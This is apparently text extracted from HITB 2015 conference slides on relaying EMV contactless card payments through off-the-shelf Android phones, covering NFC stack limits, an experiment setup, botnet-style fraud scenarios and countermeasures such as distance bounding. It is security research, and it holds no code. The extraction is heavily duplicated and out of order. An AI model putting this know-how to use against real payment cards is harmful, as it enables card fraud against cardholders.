Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
